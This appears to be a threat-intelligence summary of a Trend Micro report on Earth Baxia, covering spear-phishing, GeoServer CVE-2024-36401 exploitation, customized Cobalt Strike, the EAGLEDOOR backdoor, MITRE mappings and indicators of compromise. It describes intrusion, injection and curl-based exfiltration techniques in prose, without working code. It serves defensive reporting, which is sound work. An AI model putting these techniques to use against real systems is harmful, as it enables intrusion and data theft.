Threat Research

“Earth Baxia Targets APAC with Spear-Phishing and GeoServer Exploits”

TrendMicro

Earth Baxia, a China-based threat actor, targeted APAC government and critical sectors using spear-phishing and GeoServer CVE-2024-36401, deploying customized Cobalt Strike and a new backdoor named EAGLEDOOR to infiltrate and exfiltrate data. The operation relies on multi-protocol C2 via DNS, HTTP, TCP, and Telegram and appears tied to Alibaba Cloud infrastructure, with activities concentrated in Taiwan and other APAC nations. #EarthBaxia #CVE-2024-36401 #GeoServer #CobaltStrike #EAGLEDOOR #AlibabaCloud

Keypoints

  • Earth Baxia targeted APAC countries, with notable focus on Taiwan.
  • Initial access combined spear-phishing emails and CVE-2024-36401 GeoServer exploits.
  • Customized Cobalt Strike components were deployed with modified signatures for evasion.
  • A new backdoor, EAGLEDOOR, supports multiple communication protocols for C2 and data collection.
  • Victims span government agencies, telecommunications, and energy sectors across multiple countries; China is the likely base of operations.
  • Techniques GrimResource and AppDomainManager injection were used to deploy additional payloads and evade defenses.
  • Exfiltration leveraged curl.exe; infrastructure tied to public cloud hosting (e.g., Alibaba Cloud).

MITRE Techniques

  • [T1566] Spearphishing Attachment – ‘The attached ZIP file contains a decoy MSC file, which we named RIPCOY.’
  • [T1190] Exploit Public-Facing Application – ‘Exploited CVE-2024-36401 to execute arbitrary commands on GeoServer.’
  • [T1055] Process Injection – ‘AppDomainManager injection, which allows the injection of a custom application domain to execute arbitrary code within the process of the target application.’
  • [T1218] DLL Side-Loading – ‘Executed Cobalt Strike shellcode through DLL side-loading techniques.’
  • [T1071] Command and Control – ‘Utilized multiple protocols (DNS, HTTP, TCP, Telegram) for communication with C&C servers.’
  • [T1003] Credential Dumping – ‘Gathered information from the victim’s machine, including usernames and computer names.’
  • [T1041] Exfiltration Over C2 Channel – ‘Exfiltrated data using curl.exe to send data to their file server.’
  • [T1105] Ingress Tool Transfer – ‘The legitimate .NET applications then proceed to download the next-stage downloader… Most of the download sites identified at this stage were hosted on public cloud services, typically Aliyun.’

Indicators of Compromise

  • [IP] C2/download infrastructure – 167.172.89.142, 167.172.84.142, 152.42.243.170, 188.166.252.85
  • [URL] Malicious/download hosting – static.krislab.site
  • [File Name] Cobalt Strike toolset components – Edge.exe, msedge.dll, Logs.txt

Read more: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html